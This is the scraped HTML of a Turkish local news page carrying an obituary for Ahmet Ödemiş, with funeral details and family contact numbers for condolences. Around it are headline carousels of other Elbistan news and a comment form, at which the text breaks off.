src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/YaYam_Hastanesi__2.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/nurhakta-kadinlar-pecic-turnuvasinda-yaristi-h65768.html" title="Nurhak’ta kadınlar peçiç turnuvasında yarıştı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/02/Ysimsiz-1_55.jpg" alt="Nurhak’ta kadınlar peçiç turnuvasında yarıştı" class="pull-left" /> <div class="caption-line"><p>Nurhak’ta kadınlar peçiç turnuvasında yarıştı</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/akdeniz-meyve-sinegi-eylem-plani-toplantisi-yapildi-h65767.html" title="Akdeniz meyve sineği eylem planı toplantısı yapıldı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/02/Ysimsiz-1_54.jpg" alt="Akdeniz meyve sineği eylem planı toplantısı yapıldı" class="pull-left" /> <div class="caption-line"><p>Akdeniz meyve sineği eylem planı...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-genclik-ve-spor-hizmetleri-mudurlugu-bokeye-emanet-h65766.html" title="Elbistan Belediyesi Gençlik ve Spor Hizmetleri Müdürlüğü, Böke’ye emanet" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/02/Ysimsiz-1_53.jpg" alt="Elbistan Belediyesi Gençlik ve Spor Hizmetleri Müdürlüğü, Böke’ye emanet" class="pull-left" /> <div class="caption-line"><p>Elbistan Belediyesi Gençlik ve Spor...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/baskan-sungurdan-aof-irtibat-burosu-tesekkuru-h65762.html" title="Başkan Sungur’dan AÖF İrtibat Bürosu teşekkürü" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/02/hasansungur.jpg" alt="Başkan Sungur’dan AÖF İrtibat Bürosu teşekkürü" class="pull-left" /> <div class="caption-line"><p>Başkan Sungur’dan AÖF İrtibat Bürosu...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-onemli-bir-egitim-hizmetine-daha-kavusuyoruz-h65761.html" title="Kaymakam Demir: “Önemli bir eğitim hizmetine daha kavuşuyoruz”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/02/Ysimsiz-1_52.jpg" alt="Kaymakam Demir: “Önemli bir eğitim hizmetine daha kavuşuyoruz”" class="pull-left" /> <div class="caption-line"><p>Kaymakam Demir: “Önemli bir eğitim...</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Ahmet Ödemiş 77 yaşında</h1> <h2 class="lead" itemprop="description"><strong></strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2020-02-20 09:20:32" content="2020-02-20T09:20:32+02:00">20 Şubat 2020 Perşembe 09:20</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/ahmet_odemis_h65770_4da71.jpg" alt="Ahmet Ödemiş 77 yaşında" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/vefatlar/ahmet-odemis-77-yasinda-h65770.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><a href="http://www.elbistanbalikdunyasi.com" target="_blank"><img src="https://www.elbistanolay.com/sites/84/uploads/2020/01/17/large/balikdunyasi.gif" alt="Balik Dunyasi Reklam" border="0"/></a></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Ekinözü ilçesi Kandil Mahallesi’nden Hürü ve Elif Ödemiş’in eşi, Kamuran, Halil İbrahim, Zekeriye, Mehmet, Metin ve Sıddık Ödemiş kardeşlerin babası, Gazi Kılıç, Hakkı Kirik, Duran Kayhan, Yusuf Ceylan, Yemliha Kurt ve Ali Gözümoğlu bacanakların kayınbabası muhtar Ahmet namıyla bilinen Kentpark Marketler Zinciri’nin onursal başkanı Ahmet Ödemiş vefat etmiştir. Cenazesi, 20 Şubat Perşembe günü Ulu Cami’inde öğle namazına müteakip cenaze namazı kılınıp Türkköyü Mezarlığı’na defnedilecektir. Kur’an-ı Kerim’i, Cumhuriyet Mahallesi’nde eski Saraykent Market üstündeki kendi hanesinde okunacaktır.&#160;<br /> </span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><o:p></o:p></span><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Taziye için irtibat:</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><o:p></o:p></span><br /> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">0533 779 2654 oğlu Kamuran</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><o:p></o:p></span><br /> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">0533 779 2615 oğlu Halil İbrahim</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><o:p></o:p></span><br /> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">0533 779 2675 oğlu Zekeriye</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><o:p></o:p></span><br /> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">0505 561 0686 oğlu Mehmet</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><o:p></o:p></span></p> <p class="MsoNormal"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;"><o:p>&#160;</o:p></span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><o:p></o:p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sehit-serkan-bursalinin-adi-kutuphanede-yasayacak-h65763.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/nurhakta-kadinlar-pecic-turnuvasinda-yaristi-h65768.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tokinin-yapacagi-sosyal-konut-kurasi-22-nisanda-cekilecek-h65755.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-onemli-bir-egitim-hizmetine-daha-kavusuyoruz-h65761.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-genclik-ve-spor-hizmetleri-mudurlugu-bokeye-emanet-h65766.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/akdeniz-meyve-sinegi-eylem-plani-toplantisi-yapildi-h65767.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hoca-ahmet-yesevi-ilkokulundan-iki-onemli-etwinning-projesi-h65765.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kadin-meclisinden-gelin-adaylarina-ceyiz-yardimi-h65764.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-sungurdan-aof-irtibat-burosu-tesekkuru-h65762.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ekinozunde-yaban-hayvanlarina-yem-destegi-h65757.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/pancar-ciftcisine-egitim-toplantisi-duzenlendi-h65756.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-ucretsiz-wi-fi-hizmeti-h65754.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/uyusturucu-saticilarina-ceza-yagdi-h65753.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/teyzesini-olduren-sanik-muebbet-hapis-cezasina-carptirildi-h65751.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/esini-olduren-uzman-cavusa-agirlastirilmis-muebbet-h65750.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistana-aof-irtibat-burosu-mujdesi-h65748.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/seyir-halindeki-otomobilde-yangin-h65747.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobiller-carpisti-3-yarali-h65746.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/adnan-menderes-bulvarinda-kaza-1-yarali-h65745.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-destek-ofisi-ile-girisimcilerin-yaninda-h65737.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gazeteci-foto-73-cevdet-temel-son-yolculuguna-ugurlandi-h65739.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/afsin-deki-ruzgar-santralinin-ced-raporu-onaylandi-h65738.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanspor-10-kisi-kaldigi-maci-3-1-kaybetti-h65736.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/nacar-elbistan-siyasilerden-vaat-degil-cozum-bekliyor-h65735.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-ekonominin-omurgasi-esnaflarimizdir-h65734.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/sehit-serkan-bursalinin-adi-kutuphanede-yasayacak-h65763.html" title="Şehit Serkan Bursalı’nın adı kütüphanede yaşayacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/sehit_serkan_bursalinin_adi_kutuphanede_yasayacak_h65763_13701.jpg" alt="Şehit Serkan Bursalı’nın adı kütüphanede yaşayacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Şehit Serkan Bursalı’nın adı kütüphanede yaşayacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/nurhakta-kadinlar-pecic-turnuvasinda-yaristi-h65768.html" title="Nurhak’ta kadınlar peçiç turnuvasında yarıştı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/nurhakta_kadinlar_pecic_turnuvasinda_yaristi_h65768_a89c0.jpg" alt="Nurhak’ta kadınlar peçiç turnuvasında yarıştı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Nurhak’ta kadınlar peçiç turnuvasında yarıştı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tokinin-yapacagi-sosyal-konut-kurasi-22-nisanda-cekilecek-h65755.html" title="TOKİ’nin yapacağı sosyal konut kurası 22 Nisan’da çekilecek"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/tokinin_yapacagi_sosyal_konut_kurasi_22_nisanda_cekilecek_h65755_a0ac5.jpg" alt="TOKİ’nin yapacağı sosyal konut kurası 22 Nisan’da çekilecek" /> <div class="carousel-caption"> <h2> <span style="font-size:">TOKİ’nin yapacağı sosyal konut kurası 22 Nisan’da çekilecek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-onemli-bir-egitim-hizmetine-daha-kavusuyoruz-h65761.html" title="Kaymakam Demir: “Önemli bir eğitim hizmetine daha kavuşuyoruz”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/kaymakam_demir_onemli_bir_egitim_hizmetine_daha_kavusuyoruz_h65761_9767c.jpg" alt="Kaymakam Demir: “Önemli bir eğitim hizmetine daha kavuşuyoruz”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir: “Önemli bir eğitim hizmetine daha kavuşuyoruz”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-genclik-ve-spor-hizmetleri-mudurlugu-bokeye-emanet-h65766.html" title="Elbistan Belediyesi Gençlik ve Spor Hizmetleri Müdürlüğü, Böke’ye emanet"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/elbistan_belediyesi_genclik_ve_spor_hizmetleri_mudurlugu_bokeye_emanet_h65766_9924b.jpg" alt="Elbistan Belediyesi Gençlik ve Spor Hizmetleri Müdürlüğü, Böke’ye emanet" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi Gençlik ve Spor Hizmetleri Müdürlüğü, Böke’ye emanet</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/akdeniz-meyve-sinegi-eylem-plani-toplantisi-yapildi-h65767.html" title="Akdeniz meyve sineği eylem planı toplantısı yapıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/akdeniz_meyve_sinegi_eylem_plani_toplantisi_yapildi_h65767_7b64c.jpg" alt="Akdeniz meyve sineği eylem planı toplantısı yapıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Akdeniz meyve sineği eylem planı toplantısı yapıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hoca-ahmet-yesevi-ilkokulundan-iki-onemli-etwinning-projesi-h65765.html" title="Hoca Ahmet Yesevi İlkokulu’ndan iki önemli eTwinning projesi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/hoca_ahmet_yesevi_ilkokulundan_iki_onemli_etwinning_projesi_h65765_d102d.jpg" alt="Hoca Ahmet Yesevi İlkokulu’ndan iki önemli eTwinning projesi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hoca Ahmet Yesevi İlkokulu’ndan iki önemli eTwinning projesi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kadin-meclisinden-gelin-adaylarina-ceyiz-yardimi-h65764.html" title="Kadın Meclisi’nden Gelin Adaylarına Çeyiz Yardımı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/kadin_meclisinden_gelin_adaylarina_ceyiz_yardimi_h65764_311db.jpg" alt="Kadın Meclisi’nden Gelin Adaylarına Çeyiz Yardımı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kadın Meclisi’nden Gelin Adaylarına Çeyiz Yardımı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-sungurdan-aof-irtibat-burosu-tesekkuru-h65762.html" title="Başkan Sungur’dan AÖF İrtibat Bürosu teşekkürü"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/baskan_sungurdan_aof_irtibat_burosu_tesekkuru_h65762_4f3a8.jpg" alt="Başkan Sungur’dan AÖF İrtibat Bürosu teşekkürü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Sungur’dan AÖF İrtibat Bürosu teşekkürü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ekinozunde-yaban-hayvanlarina-yem-destegi-h65757.html" title="Ekinözü’nde yaban hayvanlarına yem desteği"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/ekinozunde_yaban_hayvanlarina_yem_destegi_h65757_5c983.jpg" alt="Ekinözü’nde yaban hayvanlarına yem desteği" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ekinözü’nde yaban hayvanlarına yem desteği</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/pancar-ciftcisine-egitim-toplantisi-duzenlendi-h65756.html" title="Pancar çiftçisine eğitim toplantısı düzenlendi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/pancar_ciftcisine_egitim_toplantisi_duzenlendi_h65756_a1976.jpg" alt="Pancar çiftçisine eğitim toplantısı düzenlendi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Pancar çiftçisine eğitim toplantısı düzenlendi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-ucretsiz-wi-fi-hizmeti-h65754.html" title="Elbistan Belediyesi’nden ücretsiz wi-fi hizmeti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/elbistan_belediyesinden_ucretsiz_wi_fi_hizmeti_h65754_68fb6.jpg" alt="Elbistan Belediyesi’nden ücretsiz wi-fi hizmeti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi’nden ücretsiz wi-fi hizmeti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/uyusturucu-saticilarina-ceza-yagdi-h65753.html" title="Uyuşturucu satıcılarına ceza yağdı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/uyusturucu_saticilarina_ceza_yagdi_h65753_8d47d.jpg" alt="Uyuşturucu satıcılarına ceza yağdı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Uyuşturucu satıcılarına ceza yağdı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/teyzesini-olduren-sanik-muebbet-hapis-cezasina-carptirildi-h65751.html" title="Teyzesini öldüren sanık, müebbet hapis cezasına çarptırıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/teyzesini_olduren_sanik_muebbet_hapis_cezasina_carptirildi_h65751_c4d35.jpg" alt="Teyzesini öldüren sanık, müebbet hapis cezasına çarptırıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Teyzesini öldüren sanık, müebbet hapis cezasına çarptırıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/esini-olduren-uzman-cavusa-agirlastirilmis-muebbet-h65750.html" title="Eşini öldüren uzman çavuşa ağırlaştırılmış müebbet"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/esini_olduren_uzman_cavusa_agirlastirilmis_muebbet_h65750_67d70.jpg" alt="Eşini öldüren uzman çavuşa ağırlaştırılmış müebbet" /> <div class="carousel-caption"> <h2> <span style="font-size:">Eşini öldüren uzman çavuşa ağırlaştırılmış müebbet</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistana-aof-irtibat-burosu-mujdesi-h65748.html" title="Elbistan’a AÖF İrtibat Bürosu müjdesi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/elbistana_aof_irtibat_burosu_mujdesi_h65748_1d003.jpg" alt="Elbistan’a AÖF İrtibat Bürosu müjdesi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’a AÖF İrtibat Bürosu müjdesi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/seyir-halindeki-otomobilde-yangin-h65747.html" title="Seyir halindeki otomobilde yangın"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/seyir_halindeki_otomobilde_yangin_h65747_5b29c.jpg" alt="Seyir halindeki otomobilde yangın" /> <div class="carousel-caption"> <h2> <span style="font-size:">Seyir halindeki otomobilde yangın</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobiller-carpisti-3-yarali-h65746.html" title="Otomobiller çarpıştı: 3 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/otomobiller_carpisti_3_yarali_h65746_b8997.jpg" alt="Otomobiller çarpıştı: 3 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobiller çarpıştı: 3 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/adnan-menderes-bulvarinda-kaza-1-yarali-h65745.html" title="Adnan Menderes Bulvarı’nda kaza: 1 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/adnan_menderes_bulvarinda_kaza_1_yarali_h65745_93f58.jpg" alt="Adnan Menderes Bulvarı’nda kaza: 1 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Adnan Menderes Bulvarı’nda kaza: 1 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-destek-ofisi-ile-girisimcilerin-yaninda-h65737.html" title="Elbistan Belediyesi, destek ofisi ile girişimcilerin yanında"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/elbistan_belediyesi_destek_ofisi_ile_girisimcilerin_yaninda_h65737_ea030.jpg" alt="Elbistan Belediyesi, destek ofisi ile girişimcilerin yanında" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi, destek ofisi ile girişimcilerin yanında</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gazeteci-foto-73-cevdet-temel-son-yolculuguna-ugurlandi-h65739.html" title="Gazeteci Foto 73 Cevdet Temel, son yolculuğuna uğurlandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/gazeteci_foto_73_cevdet_temel_son_yolculuguna_ugurlandi_h65739_e62a6.jpg" alt="Gazeteci Foto 73 Cevdet Temel, son yolculuğuna uğurlandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Gazeteci Foto 73 Cevdet Temel, son yolculuğuna uğurlandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/afsin-deki-ruzgar-santralinin-ced-raporu-onaylandi-h65738.html" title="Afşin&#039;deki rüzgar santralinin ÇED Raporu onaylandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/afsin_deki_ruzgar_santralinin_ced_raporu_onaylandi_h65738_34f57.jpg" alt="Afşin&#039;deki rüzgar santralinin ÇED Raporu onaylandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Afşin&#039;deki rüzgar santralinin ÇED Raporu onaylandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanspor-10-kisi-kaldigi-maci-3-1-kaybetti-h65736.html" title="Elbistanspor, 10 kişi kaldığı maçı 3-1 kaybetti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/elbistanspor_10_kisi_kaldigi_maci_3_1_kaybetti_h65736_585e4.jpg" alt="Elbistanspor, 10 kişi kaldığı maçı 3-1 kaybetti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanspor, 10 kişi kaldığı maçı 3-1 kaybetti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/nacar-elbistan-siyasilerden-vaat-degil-cozum-bekliyor-h65735.html" title="Nacar: “Elbistan, siyasilerden vaat değil çözüm bekliyor”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/nacar_elbistan_siyasilerden_vaat_degil_cozum_bekliyor_h65735_f67d0.jpg" alt="Nacar: “Elbistan, siyasilerden vaat değil çözüm bekliyor”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Nacar: “Elbistan, siyasilerden vaat değil çözüm bekliyor”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-ekonominin-omurgasi-esnaflarimizdir-h65734.html" title="Kaymakam Demir, “Ekonominin omurgası esnaflarımızdır”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/02/kaymakam_demir_ekonominin_omurgasi_esnaflarimizdir_h65734_b1664.jpg" alt="Kaymakam Demir, “Ekonominin omurgası esnaflarımızdır”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir, “Ekonominin omurgası esnaflarımızdır”</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">18</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/vefatlar/ahmet-odemis-77-yasinda-h65770.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(65770);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="65770" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" 